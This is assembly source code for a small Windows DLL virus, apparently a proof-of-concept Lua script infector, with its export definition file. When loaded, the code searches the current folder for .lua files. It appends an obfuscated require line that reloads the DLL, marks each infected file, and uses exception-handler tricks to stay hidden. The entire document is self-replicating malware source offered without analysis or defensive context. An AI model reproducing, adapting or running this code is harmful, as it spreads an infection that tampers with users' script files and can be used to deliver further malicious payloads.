.486
.model flat, stdcall
include windows.inc
include kernel32.inc
includelib kernel32.lib

.code
_DLL proc
push 1
pop eax
ret 0ch
_DLL endp

;-------------------------------------------------------------------------------
;we run here to hide
;-------------------------------------------------------------------------------

assume fs:nothing

luaopen_0 proc
pushad
xor ebx, ebx
call start_v
pop eax
pop eax
pop esp
xor eax, eax
pop fs:[eax]
pop eax
popad
xor eax, eax
ret

start_v:
push fs:[ebx]
mov fs:[ebx], esp
enter 200h, 0
mov edi, esp
push edi
call find_f
db "*", ".", "l", "u", "a", 0 ;there are .wlua files but we infect the most common type

find_f:
call FindFirstFile
xchg esi, eax

open_f:
push ebx
push ebx
push 3
push ebx
push 3
push 3
lea ecx, dword ptr [edi + WIN32_FIND_DATA.cFileName]
push ecx
call CreateFileA
push eax
pushad
call infect_lua
pop eax
pop eax
pop esp
xor eax, eax
pop fs:[eax]
pop eax
popad
call CloseHandle
push edi
push esi
call FindNextFile
test eax, eax
jnz open_f
int 3

;-------------------------------------------------------------------------------
;infect LUA script files
;-------------------------------------------------------------------------------

infect_lua proc
push fs:[ebx]
mov fs:[ebx], esp
push ebx
mov esi, esp
push ebx
push esp
push 0fh
db 0e8h
dd 0fh
db 0ch, "require('1'-1)"
;obfuscated DLL name ;)
;CR+LF is 0D 0A but we can use 0A, 0B, 0C, 0D individually to save 1-byte
;and if individually then we are appended to last line
;last four bytes are our infection marker
push eax
push 2
push ebx
push ebx
push eax
push ebx
push esp
push 4
push esi
push eax
push ebx
push ebx
mov ecx, dword ptr [edi + WIN32_FIND_DATA.nFileSizeLow]
sub ecx, 4
push ecx
push eax
call SetFilePointer
call ReadFile
cmp dword ptr [esi], ")1-'"
je infect_int
call SetFilePointer
call WriteFile

infect_int:
int 3 ;SEH protected
;exit to avoid stack-cleaning
infect_lua endp
luaopen_0 endp
end _DLL

----
0.def file content:

LIBRARY 0
EXPORTS luaopen_0